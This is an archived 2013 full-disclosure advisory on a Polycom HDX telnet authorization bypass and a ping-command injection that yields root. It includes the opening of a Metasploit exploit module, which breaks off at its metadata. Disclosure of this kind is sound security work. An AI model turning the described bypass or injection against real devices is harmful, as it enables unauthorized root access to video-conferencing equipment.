Date: Wed, 13 Feb 2013 11:25:21 +1300
From: Paul Haas <paul.haas@...urity-assessment.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Polycom HDX Telnet Authorization Bypass

= Polycom HDX Telnet Authorization Bypass
=
= Vendor Website:
=    www.polycom.com
=
= Affected Version:
=   Polycom HDX devices:
=     All releases prior to and including Commercial 3.0.5
=
= Public disclosure on January 18, 2013
=

== Overview ==

The Polycom HDX is a series of telecommunication and video devices. The
telnet component of Polycom HDX video endpoint devices is vulnerable to
an authorization bypass when multiple simultaneous connections are
repeatedly made to the service, allowing remote network attackers to
gain full access to a Polycom command prompt without authentication.
Versions prior to 3.0.4 also contain OS command injection in the ping
command which can be used to escape the telnet prompt and execute
arbitrary commands as root.

== Solution ==

Until a software solution is released, Polycom recommends administrators
disable telnet on their HDX unit.

== Credit ==

Discovered and advised to Polycom Inc., 2012 by Paul Haas of
Security-Assessment.com.

== About Security-Assessment.com ==

Security-Assessment.com is a leading team of Information Security
consultants specializing in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognized companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.

Web: www.security-assessment.com
Email: info@...urity-assessment.com

== Exploitation ==

The following Metasploit module can be used to reproduce the issue:

cat > psh_auth_bypass.rb <<EOF
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::Remote::Tcp
    include Msf::Auxiliary::Report

    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'Polycom Command Shell Authorization
Bypass',
            'Alias'            => 'psh_auth_bypass',
            'Author'        => [ 'Paul Haas <Paul [dot] Haas [at]
Security-Assessment.com>' ],
            'DisclosureDate'    => 'Jan 18 2013',
            'Description'    => %q{
                The login component of the Polycom Command Shell on
Polycom HDX
                Video End Points running software versions 3.0.5 and earlier
                is vulnerable to an authorization bypass when simultaneous
                connections are made to the service, allowing remote network
                attackers to gain access to a sandboxed telnet prompt
without
                authentication. Versions prior to 3.0.4 contain OS command
                injection in the ping command which can be used to execute
                arbitrary commands as root.
            },
            'License'        => MSF_LICENSE,